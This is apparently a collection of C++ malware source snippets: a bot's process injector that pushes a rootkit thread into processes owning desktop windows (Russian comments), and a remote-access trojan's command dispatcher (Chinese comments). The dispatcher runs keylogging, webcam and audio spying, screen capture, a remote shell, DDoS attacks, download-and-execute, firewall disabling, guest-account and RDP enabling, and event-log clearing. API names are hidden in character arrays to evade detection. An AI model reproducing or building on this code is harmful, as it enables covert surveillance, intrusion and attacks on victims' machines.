//------------------------------------------------------ // InjectorProc - Основная функция инжектора, которая // постоянно мониторит запущенные процессы //------------------------------------------------------ DWORD WINAPI INJECTOR::InjectorProc(LPVOID) { // Алгоритм работы следующий: // Перебираем все кна рабочего стола и инжектимся // в поцесы владельцы BOT::Initialize(); INJKDBG("INJECTOR", "Запущен процесс инжектра"); TInjector Injector; Injector.IsWin64 = IsWIN64(); Injector.Injected = new TBotList(); Injector.NameBufSize = 1024; Injector.NameBuf = (LPBYTE)MemAlloc(Injector.NameBufSize); // Для старта определяем основную функцию руткита Injector.InjectFunction = RootkitThread; /* // Загружаем плагин INJKDBG("INJECTOR", "Загружаем bot.plug"); for (int i = 0; i < 2; i++) { LPVOID Plug = NULL; LPVOID PlugHandle = NULL; if (LoadBotPlug(&Plug, NULL)) { PlugHandle = MemoryLoadLibrary(Plug, false); Injector.InjectFunction = (TInjectFunction)MemoryGetProcAddress(PlugHandle, START_PROC_HASH); FreeBotPlug(Plug); } if (Injector.InjectFunction) break; // В случае ошибки получения адреса функции // принудительно обновляем плагин MemoryFreeLibrary(PlugHandle); UpdateBotPlug(); } if (!Injector.InjectFunction) pExitProcess(0); */ INJKDBG("INJECTOR", "Стартуем"); while (!BOT::Terminated()) { // Перебираем главные окна окна pEnumWindows(WndEnumCallBak, &Injector); pSleep(500); } // При завершении работы выходим из процесса pExitProcess(0); return 0; }
LPBYTE CSystemManager::getWindowsList() { LPBYTE lpBuffer = NULL; char DYrEN66[] = {'E','n','u','m','W','i','n','d','o','w','s','\0'}; EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN66); pEnumWindows((WNDENUMPROC)EnumWindowsProc, (LPARAM)&lpBuffer); lpBuffer[0] = TOKEN_WSLIST; return lpBuffer; }
// 加上激活 void CKernelManager::OnReceive(LPBYTE lpBuffer, UINT nSize) { typedef LONG (WINAPI *InterlockedExchangeT) ( __inout LONG volatile *Target, __in LONG Value ); InterlockedExchangeT pInterlockedExchange = (InterlockedExchangeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"InterlockedExchange"); typedef VOID (WINAPI *SleepT) ( __in DWORD dwMilliseconds ); SleepT pSleep = (SleepT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"Sleep"); typedef HANDLE (WINAPI *CreateThreadT)( __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in SIZE_T dwStackSize, __in LPTHREAD_START_ROUTINE lpStartAddress, __in_opt LPVOID lpParameter, __in DWORD dwCreationFlags, __out_opt LPDWORD lpThreadId ); CreateThreadT pCreateThread=(CreateThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateThread"); typedef BOOL (WINAPI *CloseHandleT) ( __in HANDLE hObject ); char DDZGlGm[] = {'C','l','o','s','e','H','a','n','d','l','e','\0'}; CloseHandleT pCloseHandle = (CloseHandleT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DDZGlGm); typedef BOOL (WINAPI *EnumWindowsT)( __in WNDENUMPROC lpEnumFunc, __in LPARAM lParam); EnumWindowsT pEnumWindows=(EnumWindowsT)GetProcAddress(LoadLibrary("USER32.dll"),"EnumWindows"); switch (lpBuffer[0]) { case COMMAND_ACTIVED: pInterlockedExchange((LONG *)&m_bIsActived, true); break; case COMMAND_LIST_DRIVE: // 文件管理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_FileManager, (LPVOID)m_pClient->m_Socket, 0, NULL, false); break; case COMMAND_SCREEN_SPY: // 屏幕查看 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ScreenManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true); break; case COMMAND_WEBCAM: // 摄像头 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_VideoManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_AUDIO: // 声音监听 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_AudioManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SHELL: // 远程sehll m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_ShellManager, (LPVOID)m_pClient->m_Socket, 0, NULL, true); break; case COMMAND_KEYBOARD: //键盘记录 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_KeyboardManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SYSTEM: //系统管理,包括进程,窗口 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SystemManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SERMANAGER: // 服务管理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SerManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_DDOS_ATTACK: { ATTACK m_Attack; memcpy(&m_Attack,lpBuffer + 1,sizeof(ATTACK)); DDOSManager m_DDOSManager(&m_Attack); } break; case COMMAND_DDOS_STOP: Stoping = FALSE; break; case COMMAND_REGEDIT: //注册表管理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_RegeditManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_SYSINFO: m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_SysInfoManager, (LPVOID)m_pClient->m_Socket, 0, NULL); break; case COMMAND_NET_USER: // 无NET加用户 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)NETUSER, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_OPEN_PROXY: // 开启代理 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)OpenProxy, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_OPEN_3389: { Open3389((LPCTSTR)(lpBuffer + 1), nSize -2); } break; case COMMAND_GUEST: // 开启GUEST账号 OpenGuest(); break; case COMMAND_STOPFIRE: // 关防火墙 StopFire(); break; case COMMAND_CHANGE_PORT: // 更改终端 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0,(LPTHREAD_START_ROUTINE)ChangePort, (LPVOID)(lpBuffer + 1), 0, NULL, true); break; case COMMAND_SENDMSG: { pCloseHandle(pCreateThread(NULL,NULL,Loop_MsgBox,&lpBuffer[1],NULL,NULL)); pSleep(500); } break; case COMMAND_DOWN_EXEC: // 下载者 m_hThread[m_nThreadCount++] = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Loop_DownManager, (LPVOID)(lpBuffer + 1), 0, NULL, true); pSleep(100); // 传递参数用 break; case COMMAND_OPEN_URL_SHOW: // 显示打开网页 OpenURL((LPCTSTR)(lpBuffer + 1), SW_SHOWNORMAL); break; case COMMAND_OPEN_URL_HIDE: // 隐藏打开网页 OpenURL((LPCTSTR)(lpBuffer + 1), SW_HIDE); break; case COMMAND_REMOVE: // 卸载, UnInstallService(); break; case COMMAND_CLEAN_EVENT: // 清除日志 CleanEvent(); break; case COMMAND_SESSION://会话管理 CSystemManager::ShutdownWindows(lpBuffer[1]); break; case COMMAND_RENAME_REMARK: // 改备注 SetHostID((LPCTSTR)(lpBuffer + 1)); break; case COMMAND_CHANGE_GROUP: // 改分组 SetInfo("Group", (LPCTSTR)(lpBuffer + 1), "BITS"); break; case COMMAND_UPDATE_SERVER: // 更新服务端 if (UpdateServer((char *)lpBuffer + 1)) UnInstallService(); break; case COMMAND_REPLAY_HEARTBEAT: // 回复心跳包 break; case COMMAND_SORT_PROCESS: // 进程筛选 try { if (isProcesin((LPTSTR)(lpBuffer + 1))) { BYTE bToken = TOKEN_INFO_YES; m_pClient->Send(&bToken, 1); }else { BYTE bToken = TOKEN_INFO_NO; m_pClient->Send(&bToken, 1); } }catch(...){} break; case COMMAND_SORT_WINDOW: // 窗体筛选 try { strcpy(temp_proc,(LPTSTR)(lpBuffer + 1)); pEnumWindows(EnumWindowsList,0); if (proc_tag) { BYTE bToken = TOKEN_INFO_YES; m_pClient->Send(&bToken, 1); proc_tag = false; }else { BYTE bToken = TOKEN_INFO_NO; m_pClient->Send(&bToken, 1); } }catch(...){} break; } }